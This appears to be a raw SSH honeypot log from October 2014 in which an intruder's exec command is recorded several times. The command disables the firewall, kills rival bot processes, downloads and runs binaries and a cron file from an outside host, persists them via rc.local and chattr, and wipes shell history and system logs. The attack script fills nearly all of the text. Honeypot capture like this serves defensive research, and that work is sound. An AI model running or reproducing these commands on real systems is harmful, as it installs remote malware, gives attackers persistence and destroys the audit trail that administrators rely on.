cd /tmp;chmod 7777 byv832 cd /tmp;chmod 7777 sfewfesfs cd /tmp;chmod 7777 gfhjrtfyhuf cd /tmp;chmod 7777 rewgtf3er4t cd /tmp;chmod 7777 fdsfsfvff cd /tmp;chmod 7777 smarvtd cd /tmp;chmod 7777 whitptabil cd /tmp;chmod 7777 gdmorpen cd /tmp;./jdhe nohup /etc/sfewfesfs > /dev/null 2>&1& nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& nohup /etc/rewgtf3er4t > /dev/null 2>&1& nohup /etc/fdsfsfvff > /dev/null 2>&1& nohup /etc/smarvtd > /dev/null 2>&1& nohup /etc/whitptabil > /dev/null 2>&1& nohup /etc/gdmorpen > /dev/null 2>&1& nohup /etc/nhgbhhj > /dev/null 2>&1& nohup /etc/byv832 > /dev/null 2>&1& nohup /tmp/sfewfesfs > /dev/null 2>&1& nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& nohup /tmp/rewgtf3er4t > /dev/null 2>&1& nohup /tmp/fdsfsfvff > /dev/null 2>&1& nohup /tmp/smarvtd > /dev/null 2>&1& nohup /tmp/whitptabil > /dev/null 2>&1& nohup /tmp/gdmorpen > /dev/null 2>&1& nohup /tmp/nhgbhhj > /dev/null 2>&1& nohup /tmp/byv832 > /dev/null 2>&1& echo "cd /tmp;./sfewfesfs" >> /etc/rc.local echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local echo "cd /tmp;./smarvtd" >> /etc/rc.local echo "cd /tmp;./whitptabil" >> /etc/rc.local echo "cd /tmp;./gdmorpen" >> /etc/rc.local echo "cd /etc;./sfewfesfs" >> /etc/rc.local echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local echo "cd /etc;./fdsfsfvff" >> /etc/rc.local echo "cd /etc;./smarvtd" >> /etc/rc.local echo "cd /etc;./whitptabil" >> /etc/rc.local echo "cd /etc;./gdmorpen" >> /etc/rc.local echo "unset MAILCHECK" >> /etc/profile cd /etc;chattr +i sfewfesfs rm -rf /root/.bash_history touch /root/.bash_history history -r cd /var/log > dmesg cd /var/log > auth.log cd /var/log > alternatives.log cd /var/log > boot.log cd /var/log > btmp cd /var/log > cron cd /var/log > cups cd /var/log > daemon.log cd /var/log > dpkg.log cd /var/log > faillog cd /var/log > kern.log cd /var/log > lastlog cd /var/log > maillog cd /var/log > user.log cd /var/log > Xorg.x.log cd /var/log > anaconda.log cd /var/log > yum.log cd /var/log > secure cd /var/log > wtmp cd /var/log > utmp cd /var/log > messages cd /var/log > spooler cd /var/log > sudolog cd /var/log > aculog cd /var/log > access-log cd /root > .bash_history history -c" 2014-10-17 03:55:08+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,7,122.225.109.214] exec command: "/etc/init.d/iptables stop echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "nameserver 8.8.4.4" >> /etc/resolv.conf apt-get -y install wget yum -y install wget chmod 7777 / etc killall -9 .IptabLes killall -9 nfsd4 killall -9 profild.key cd /etc;rm -rf dir fake.cfg killall -9 nfsd killall -9 DDosl killall -9 lengchao32 killall -9 b26 killall -9 khelper killall -9 Bill killall -9 n26 killall -9 007 killall -9 codelove killall -9 32 killall -9 m32 killall -9 m64 killall -9 64 killall -9 83BOT killall -9 82BOT killall -9 dos64 killall -9 dos32 killall -9 new6 killall -9 new4 killall -9 node24 killall -9 mimi killall -9 nodeJR-1 killall -9 freeBSD killall -9 ksapdd killall -9 106 killall -9 09 killall -9 xsw killall -9 syslogd killall -9 skysapdd killall -9 cupsddd killall -9 ksapd killall -9 atddd killall -9 xfsdxd killall -9 sfewfesfs killall -9 gfhjrtfyhuf killall -9 rewgtf3er4t killall -9 fdsfsfvff killall -9 smarvtd killall -9 whitptabil killall -9 gdmorpen cd /etc;chattr -i 66 cd /root; chmod 7777 / etc killall -9 minerd killall -9 syn killall -9 joudckfr killall -9 www killall -9 log killall -9 .IptabLes killall -9 .IptabLex killall -9 .Mm2 killall -9 acpid killall -9 m64 killall -9 ./QQ killall -9 aabb killall -9 g3 killall -9 S99local killall -9 3 killall -9 pm killall -9 qweasd killall -9 tangtang killall -9 imap-login killall -9 xudp killall -9 sshpa killall -9 008 killall -9 txma killall -9 mrdos64.b00 killall -9 mrdos32.b00 killall -9 kkpklp killall -9 kiilp killall -9 xin1 killall -9 jibateng killall -9 syscore.sh killall -9 syscore.sh killall -9 syscore.sh killall -9 .mimeo killall -9 .mimeo killall -9 .mimeo killall -9 .mimeop killall -9 .task1 killall -9 .mimeop killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex cd /root;rm -rf dir nohup.out cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsddd.* cd /etc;rm -rf dir atddd.* cd /etc;rm -rf dir ksapdd.* cd /etc;rm -rf dir kysapdd.* cd /etc;rm -rf dir sksapdd.* cd /etc;rm -rf dir skysapdd.* cd /etc;rm -rf dir xfsdxd.* cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsdd.* cd /etc;rm -rf dir atdd.* cd /etc;rm -rf dir ksapd.* cd /etc;rm -rf dir kysapd.* cd /etc;rm -rf dir sksapd.* cd /etc;rm -rf dir skysapd.* cd /etc;rm -rf dir xfsdx.* cd /etc;rm -rf dir sfewfesfs cd /etc;rm -rf dir gfhjrtfyhuf cd /etc;rm -rf dir rewgtf3er4t cd /etc;rm -rf dir fdsfsfvff cd /etc;rm -rf dir smarvtd cd /etc;rm -rf dir whitptabil cd /etc;rm -rf dir gdmorpen cd /etc;rm -rf dir sfewfesfs.* cd /etc;rm -rf dir gfhjrtfyhuf.* cd /etc;rm -rf dir rewgtf3er4t.* cd /etc;rm -rf dir fdsfsfvff.* cd /etc;rm -rf dir smarvtd.* cd /etc;rm -rf dir whitptabil.* cd /etc;rm -rf dir gdmorpen.* cd /etc;rm -rf dir nhgbhhj.* cd /tmp;rm -rf dir 1.* cd /tmp;rm -rf dir 2.* cd /tmp;rm -rf dir 3.* cd /tmp;rm -rf dir 4.* cd /tmp;rm -rf dir 5.* cd /tmp;rm -rf dir jdhe cd /tmp;rm -rf dir jdhe.* cd /var/spool/cron; rm -rf dir root.* cd /var/spool/cron; rm -rf dir root cd /var/spool/cron/crontabs; rm -rf dir root.* cd /var/spool/cron/crontabs; rm -rf dir root cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root yes|mv /tmp/root /var/spool/cron yes|mv /tmp/root /var/spool/cron/crontabs cd /tmp;wget -c http://www.frade8c.com:9162/jdhe cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff cd /etc;wget -c http://www.frade8c.com:9162/smarvtd cd /etc;wget -c http://www.frade8c.com:9162/whitptabil cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj cd /etc;wget -c http://www.frade8c.com:9162/byv832 cd /tmp;chmod 7777 jdhe cd /etc;chmod 7777 nhgbhhj cd /etc;chmod 7777 byv832 cd /etc;chmod 7777 sfewfesfs cd /etc;chmod 7777 gfhjrtfyhuf cd /etc;chmod 7777 rewgtf3er4t cd /etc;chmod 7777 fdsfsfvff cd /etc;chmod 7777 smarvtd cd /etc;chmod 7777 whitptabil cd /etc;chmod 7777 gdmorpen cd /tmp;chmod 7777 nhgbhhj cd /tmp;chmod 7777 byv832 cd /tmp;chmod 7777 sfewfesfs cd /tmp;chmod 7777 gfhjrtfyhuf cd /tmp;chmod 7777 rewgtf3er4t cd /tmp;chmod 7777 fdsfsfvff cd /tmp;chmod 7777 smarvtd cd /tmp;chmod 7777 whitptabil cd /tmp;chmod 7777 gdmorpen cd /tmp;./jdhe nohup /etc/sfewfesfs > /dev/null 2>&1& nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& nohup /etc/rewgtf3er4t > /dev/null 2>&1& nohup /etc/fdsfsfvff > /dev/null 2>&1& nohup /etc/smarvtd > /dev/null 2>&1& nohup /etc/whitptabil > /dev/null 2>&1& nohup /etc/gdmorpen > /dev/null 2>&1& nohup /etc/nhgbhhj > /dev/null 2>&1& nohup /etc/byv832 > /dev/null 2>&1& nohup /tmp/sfewfesfs > /dev/null 2>&1& nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& nohup /tmp/rewgtf3er4t > /dev/null 2>&1& nohup /tmp/fdsfsfvff > /dev/null 2>&1& nohup /tmp/smarvtd > /dev/null 2>&1& nohup /tmp/whitptabil > /dev/null 2>&1& nohup /tmp/gdmorpen > /dev/null 2>&1& nohup /tmp/nhgbhhj > /dev/null 2>&1& nohup /tmp/byv832 > /dev/null 2>&1& echo "cd /tmp;./sfewfesfs" >> /etc/rc.local echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local echo "cd /tmp;./smarvtd" >> /etc/rc.local echo "cd /tmp;./whitptabil" >> /etc/rc.local echo "cd /tmp;./gdmorpen" >> /etc/rc.local echo "cd /etc;./sfewfesfs" >> /etc/rc.local echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local echo "cd /etc;./fdsfsfvff" >> /etc/rc.local echo "cd /etc;./smarvtd" >> /etc/rc.local echo "cd /etc;./whitptabil" >> /etc/rc.local echo "cd /etc;./gdmorpen" >> /etc/rc.local echo "unset MAILCHECK" >> /etc/profile cd /etc;chattr +i sfewfesfs rm -rf /root/.bash_history touch /root/.bash_history history -r cd /var/log > dmesg cd /var/log > auth.log cd /var/log > alternatives.log cd /var/log > boot.log cd /var/log > btmp cd /var/log > cron cd /var/log > cups cd /var/log > daemon.log cd /var/log > dpkg.log cd /var/log > faillog cd /var/log > kern.log cd /var/log > lastlog cd /var/log > maillog cd /var/log > user.log cd /var/log > Xorg.x.log cd /var/log > anaconda.log cd /var/log > yum.log cd /var/log > secure cd /var/log > wtmp cd /var/log > utmp cd /var/log > messages cd /var/log > spooler cd /var/log > sudolog cd /var/log > aculog cd /var/log > access-log cd /root > .bash_history history -c" 2014-10-17 03:55:08+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,7,122.225.109.214] Opening TTY log: log/tty/20141017-035508-7189.log 2014-10-17 03:55:09+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,7,122.225.109.214] Running exec command "/etc/init.d/iptables stop echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "nameserver 8.8.4.4" >> /etc/resolv.conf apt-get -y install wget yum -y install wget chmod 7777 / etc killall -9 .IptabLes killall -9 nfsd4 killall -9 profild.key cd /etc;rm -rf dir fake.cfg killall -9 nfsd killall -9 DDosl killall -9 lengchao32 killall -9 b26 killall -9 khelper killall -9 Bill killall -9 n26 killall -9 007 killall -9 codelove killall -9 32 killall -9 m32 killall -9 m64 killall -9 64 killall -9 83BOT killall -9 82BOT killall -9 dos64 killall -9 dos32 killall -9 new6 killall -9 new4 killall -9 node24 killall -9 mimi killall -9 nodeJR-1 killall -9 freeBSD killall -9 ksapdd killall -9 106 killall -9 09 killall -9 xsw killall -9 syslogd killall -9 skysapdd killall -9 cupsddd killall -9 ksapd killall -9 atddd killall -9 xfsdxd killall -9 sfewfesfs killall -9 gfhjrtfyhuf killall -9 rewgtf3er4t killall -9 fdsfsfvff killall -9 smarvtd killall -9 whitptabil killall -9 gdmorpen cd /etc;chattr -i 66 cd /root; chmod 7777 / etc killall -9 minerd killall -9 syn killall -9 joudckfr killall -9 www killall -9 log killall -9 .IptabLes killall -9 .IptabLex killall -9 .Mm2 killall -9 acpid killall -9 m64 killall -9 ./QQ killall -9 aabb killall -9 g3 killall -9 S99local killall -9 3 killall -9 pm killall -9 qweasd killall -9 tangtang killall -9 imap-login killall -9 xudp killall -9 sshpa killall -9 008 killall -9 txma killall -9 mrdos64.b00 killall -9 mrdos32.b00 killall -9 kkpklp killall -9 kiilp killall -9 xin1 killall -9 jibateng killall -9 syscore.sh killall -9 syscore.sh killall -9 syscore.sh killall -9 .mimeo killall -9 .mimeo killall -9 .mimeo killall -9 .mimeop killall -9 .task1 killall -9 .mimeop killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex cd /root;rm -rf dir nohup.out cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsddd.* cd /etc;rm -rf dir atddd.* cd /etc;rm -rf dir ksapdd.* cd /etc;rm -rf dir kysapdd.* cd /etc;rm -rf dir sksapdd.* cd /etc;rm -rf dir skysapdd.* cd /etc;rm -rf dir xfsdxd.* cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsdd.* cd /etc;rm -rf dir atdd.* cd /etc;rm -rf dir ksapd.* cd /etc;rm -rf dir kysapd.* cd /etc;rm -rf dir sksapd.* cd /etc;rm -rf dir skysapd.* cd /etc;rm -rf dir xfsdx.* cd /etc;rm -rf dir sfewfesfs cd /etc;rm -rf dir gfhjrtfyhuf cd /etc;rm -rf dir rewgtf3er4t cd /etc;rm -rf dir fdsfsfvff cd /etc;rm -rf dir smarvtd cd /etc;rm -rf dir whitptabil cd /etc;rm -rf dir gdmorpen cd /etc;rm -rf dir sfewfesfs.* cd /etc;rm -rf dir gfhjrtfyhuf.* cd /etc;rm -rf dir rewgtf3er4t.* cd /etc;rm -rf dir fdsfsfvff.* cd /etc;rm -rf dir smarvtd.* cd /etc;rm -rf dir whitptabil.* cd /etc;rm -rf dir gdmorpen.* cd /etc;rm -rf dir nhgbhhj.* cd /tmp;rm -rf dir 1.* cd /tmp;rm -rf dir 2.* cd /tmp;rm -rf dir 3.* cd /tmp;rm -rf dir 4.* cd /tmp;rm -rf dir 5.* cd /tmp;rm -rf dir jdhe cd /tmp;rm -rf dir jdhe.* cd /var/spool/cron; rm -rf dir root.* cd /var/spool/cron; rm -rf dir root cd /var/spool/cron/crontabs; rm -rf dir root.* cd /var/spool/cron/crontabs; rm -rf dir root cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root yes|mv /tmp/root /var/spool/cron yes|mv /tmp/root /var/spool/cron/crontabs cd /tmp;wget -c http://www.frade8c.com:9162/jdhe cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff cd /etc;wget -c http://www.frade8c.com:9162/smarvtd cd /etc;wget -c http://www.frade8c.com:9162/whitptabil cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj cd /etc;wget -c http://www.frade8c.com:9162/byv832 cd /tmp;chmod 7777 jdhe cd /etc;chmod 7777 nhgbhhj cd /etc;chmod 7777 byv832 cd /etc;chmod 7777 sfewfesfs cd /etc;chmod 7777 gfhjrtfyhuf cd /etc;chmod 7777 rewgtf3er4t cd /etc;chmod 7777 fdsfsfvff cd /etc;chmod 7777 smarvtd cd /etc;chmod 7777 whitptabil cd /etc;chmod 7777 gdmorpen cd /tmp;chmod 7777 nhgbhhj cd /tmp;chmod 7777 byv832 cd /tmp;chmod 7777 sfewfesfs cd /tmp;chmod 7777 gfhjrtfyhuf cd /tmp;chmod 7777 rewgtf3er4t cd /tmp;chmod 7777 fdsfsfvff cd /tmp;chmod 7777 smarvtd cd /tmp;chmod 7777 whitptabil cd /tmp;chmod 7777 gdmorpen cd /tmp;./jdhe nohup /etc/sfewfesfs > /dev/null 2>&1& nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& nohup /etc/rewgtf3er4t > /dev/null 2>&1& nohup /etc/fdsfsfvff > /dev/null 2>&1& nohup /etc/smarvtd > /dev/null 2>&1& nohup /etc/whitptabil > /dev/null 2>&1& nohup /etc/gdmorpen > /dev/null 2>&1& nohup /etc/nhgbhhj > /dev/null 2>&1& nohup /etc/byv832 > /dev/null 2>&1& nohup /tmp/sfewfesfs > /dev/null 2>&1& nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& nohup /tmp/rewgtf3er4t > /dev/null 2>&1& nohup /tmp/fdsfsfvff > /dev/null 2>&1& nohup /tmp/smarvtd > /dev/null 2>&1& nohup /tmp/whitptabil > /dev/null 2>&1& nohup /tmp/gdmorpen > /dev/null 2>&1& nohup /tmp/nhgbhhj > /dev/null 2>&1& nohup /tmp/byv832 > /dev/null 2>&1& echo "cd /tmp;./sfewfesfs" >> /etc/rc.local echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local echo "cd /tmp;./smarvtd" >> /etc/rc.local echo "cd /tmp;./whitptabil" >> /etc/rc.local echo "cd /tmp;./gdmorpen" >> /etc/rc.local echo "cd /etc;./sfewfesfs" >> /etc/rc.local echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local echo "cd /etc;./fdsfsfvff" >> /etc/rc.local echo "cd /etc;./smarvtd" >> /etc/rc.local echo "cd /etc;./whitptabil" >> /etc/rc.local echo "cd /etc;./gdmorpen" >> /etc/rc.local echo "unset MAILCHECK" >> /etc/profile cd /etc;chattr +i sfewfesfs rm -rf /root/.bash_history touch /root/.bash_history history -r cd /var/log > dmesg cd /var/log > auth.log cd /var/log > alternatives.log cd /var/log > boot.log cd /var/log > btmp cd /var/log > cron cd /var/log > cups cd /var/log > daemon.log cd /var/log > dpkg.log cd /var/log > faillog cd /var/log > kern.log cd /var/log > lastlog cd /var/log > maillog cd /var/log > user.log cd /var/log > Xorg.x.log cd /var/log > anaconda.log cd /var/log > yum.log cd /var/log > secure cd /var/log > wtmp cd /var/log > utmp cd /var/log > messages cd /var/log > spooler cd /var/log > sudolog cd /var/log > aculog cd /var/log > access-log cd /root > .bash_history history -c" 2014-10-17 03:55:09+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,7,122.225.109.214] CMD: /etc/init.d/iptables stop echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "nameserver 8.8.4.4" >> /etc/resolv.conf apt-get -y install wget yum -y install wget chmod 7777 / etc killall -9 .IptabLes killall -9 nfsd4 killall -9 profild.key cd /etc;rm -rf dir fake.cfg killall -9 nfsd killall -9 DDosl killall -9 lengchao32 killall -9 b26 killall -9 khelper killall -9 Bill killall -9 n26 killall -9 007 killall -9 codelove killall -9 32 killall -9 m32 killall -9 m64 killall -9 64 killall -9 83BOT killall -9 82BOT killall -9 dos64 killall -9 dos32 killall -9 new6 killall -9 new4 killall -9 node24 killall -9 mimi killall -9 nodeJR-1 killall -9 freeBSD killall -9 ksapdd killall -9 106 killall -9 09 killall -9 xsw killall -9 syslogd killall -9 skysapdd killall -9 cupsddd killall -9 ksapd killall -9 atddd killall -9 xfsdxd killall -9 sfewfesfs killall -9 gfhjrtfyhuf killall -9 rewgtf3er4t killall -9 fdsfsfvff killall -9 smarvtd killall -9 whitptabil killall -9 gdmorpen cd /etc;chattr -i 66 cd /root; chmod 7777 / etc killall -9 minerd killall -9 syn killall -9 joudckfr killall -9 www killall -9 log killall -9 .IptabLes killall -9 .IptabLex killall -9 .Mm2 killall -9 acpid killall -9 m64 killall -9 ./QQ killall -9 aabb killall -9 g3 killall -9 S99local killall -9 3 killall -9 pm killall -9 qweasd killall -9 tangtang killall -9 imap-login killall -9 xudp killall -9 sshpa killall -9 008 killall -9 txma killall -9 mrdos64.b00 killall -9 mrdos32.b00 killall -9 kkpklp killall -9 kiilp killall -9 xin1 killall -9 jibateng killall -9 syscore.sh killall -9 syscore.sh killall -9 syscore.sh killall -9 .mimeo killall -9 .mimeo killall -9 .mimeo killall -9 .mimeop killall -9 .task1 killall -9 .mimeop killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex cd /root;rm -rf dir nohup.out cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsddd.* cd /etc;rm -rf dir atddd.* cd /etc;rm -rf dir ksapdd.* cd /etc;rm -rf dir kysapdd.* cd /etc;rm -rf dir sksapdd.* cd /etc;rm -rf dir skysapdd.* cd /etc;rm -rf dir xfsdxd.* cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsdd.* cd /etc;rm -rf dir atdd.* cd /etc;rm -rf dir ksapd.* cd /etc;rm -rf dir kysapd.* cd /etc;rm -rf dir sksapd.* cd /etc;rm -rf dir skysapd.* cd /etc;rm -rf dir xfsdx.* cd /etc;rm -rf dir sfewfesfs cd /etc;rm -rf dir gfhjrtfyhuf cd /etc;rm -rf dir rewgtf3er4t cd /etc;rm -rf dir fdsfsfvff cd /etc;rm -rf dir smarvtd cd /etc;rm -rf dir whitptabil cd /etc;rm -rf dir gdmorpen cd /etc;rm -rf dir sfewfesfs.* cd /etc;rm -rf dir gfhjrtfyhuf.* cd /etc;rm -rf dir rewgtf3er4t.* cd /etc;rm -rf dir fdsfsfvff.* cd /etc;rm -rf dir smarvtd.* cd /etc;rm -rf dir whitptabil.* cd /etc;rm -rf dir gdmorpen.* cd /etc;rm -rf dir nhgbhhj.* cd /tmp;rm -rf dir 1.* cd /tmp;rm -rf dir 2.* cd /tmp;rm -rf dir 3.* cd /tmp;rm -rf dir 4.* cd /tmp;rm -rf dir 5.* cd /tmp;rm -rf dir jdhe cd /tmp;rm -rf dir jdhe.* cd /var/spool/cron; rm -rf dir root.* cd /var/spool/cron; rm -rf dir root cd /var/spool/cron/crontabs; rm -rf dir root.* cd /var/spool/cron/crontabs; rm -rf dir root cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root yes|mv /tmp/root /var/spool/cron yes|mv /tmp/root /var/spool/cron/crontabs cd /tmp;wget -c http://www.frade8c.com:9162/jdhe cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff cd /etc;wget -c http://www.frade8c.com:9162/smarvtd cd /etc;wget -c http://www.frade8c.com:9162/whitptabil cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj cd /etc;wget -c http://www.frade8c.com:9162/byv832 cd /tmp;chmod 7777 jdhe cd /etc;chmod 7777 nhgbhhj cd /etc;chmod 7777 byv832 cd /etc;chmod 7777 sfewfesfs cd /etc;chmod 7777 gfhjrtfyhuf cd /etc;chmod 7777 rewgtf3er4t cd /etc;chmod 7777 fdsfsfvff cd /etc;chmod 7777 smarvtd cd /etc;chmod 7777 whitptabil cd /etc;chmod 7777 gdmorpen cd /tmp;chmod 7777 nhgbhhj cd /tmp;chmod 7777 byv832 cd /tmp;chmod 7777 sfewfesfs cd /tmp;chmod 7777 gfhjrtfyhuf cd /tmp;chmod 7777 rewgtf3er4t cd /tmp;chmod 7777 fdsfsfvff cd /tmp;chmod 7777 smarvtd cd /tmp;chmod 7777 whitptabil cd /tmp;chmod 7777 gdmorpen cd /tmp;./jdhe nohup /etc/sfewfesfs > /dev/null 2>&1& nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& nohup /etc/rewgtf3er4t > /dev/null 2>&1& nohup /etc/fdsfsfvff > /dev/null 2>&1& nohup /etc/smarvtd > /dev/null 2>&1& nohup /etc/whitptabil > /dev/null 2>&1& nohup /etc/gdmorpen > /dev/null 2>&1& nohup /etc/nhgbhhj > /dev/null 2>&1& nohup /etc/byv832 > /dev/null 2>&1& nohup /tmp/sfewfesfs > /dev/null 2>&1& nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& nohup /tmp/rewgtf3er4t > /dev/null 2>&1& nohup /tmp/fdsfsfvff > /dev/null 2>&1& nohup /tmp/smarvtd > /dev/null 2>&1& nohup /tmp/whitptabil > /dev/null 2>&1& nohup /tmp/gdmorpen > /dev/null 2>&1& nohup /tmp/nhgbhhj > /dev/null 2>&1& nohup /tmp/byv832 > /dev/null 2>&1& echo "cd /tmp;./sfewfesfs" >> /etc/rc.local echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local echo "cd /tmp;./smarvtd" >> /etc/rc.local echo "cd /tmp;./whitptabil" >> /etc/rc.local echo "cd /tmp;./gdmorpen" >> /etc/rc.local echo "cd /etc;./sfewfesfs" >> /etc/rc.local echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local echo "cd /etc;./fdsfsfvff" >> /etc/rc.local echo "cd /etc;./smarvtd" >> /etc/rc.local echo "cd /etc;./whitptabil" >> /etc/rc.local echo "cd /etc;./gdmorpen" >> /etc/rc.local echo "unset MAILCHECK" >> /etc/profile cd /etc;chattr +i sfewfesfs rm -rf /root/.bash_history touch /root/.bash_history history -r cd /var/log > dmesg cd /var/log > auth.log cd /var/log > alternatives.log cd /var/log > boot.log cd /var/log > btmp cd /var/log > cron cd /var/log > cups cd /var/log > daemon.log cd /var/log > dpkg.log cd /var/log > faillog cd /var/log > kern.log cd /var/log > lastlog cd /var/log > maillog cd /var/log > user.log cd /var/log > Xorg.x.log cd /var/log > anaconda.log cd /var/log > yum.log cd /var/log > secure cd /var/log > wtmp cd /var/log > utmp cd /var/log > messages cd /var/log > spooler cd /var/log > sudolog cd /var/log > aculog cd /var/log > access-log cd /root > .bash_history history -c 2014-10-17 03:55:09+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,7,122.225.109.214] Command not found: /etc/init.d/iptables stop echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "nameserver 8.8.4.4" >> /etc/resolv.conf apt-get -y install wget yum -y install wget chmod 7777 / etc killall -9 .IptabLes killall -9 nfsd4 killall -9 profild.key cd /etc 2014-10-17 03:55:09+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,7,122.225.109.214] Command found: rm -rf dir fake.cfg killall -9 nfsd killall -9 DDosl killall -9 lengchao32 killall -9 b26 killall -9 khelper killall -9 Bill killall -9 n26 killall -9 007 killall -9 codelove killall -9 32 killall -9 m32 killall -9 m64 killall -9 64 killall -9 83BOT k 2014-10-17 03:55:09+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,7,122.225.109.214] sending close 0 2014-10-17 03:55:09+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,7,122.225.109.214] remote close 2014-10-17 03:55:09+0100 [HoneyPotTransport,7,122.225.109.214] connection lost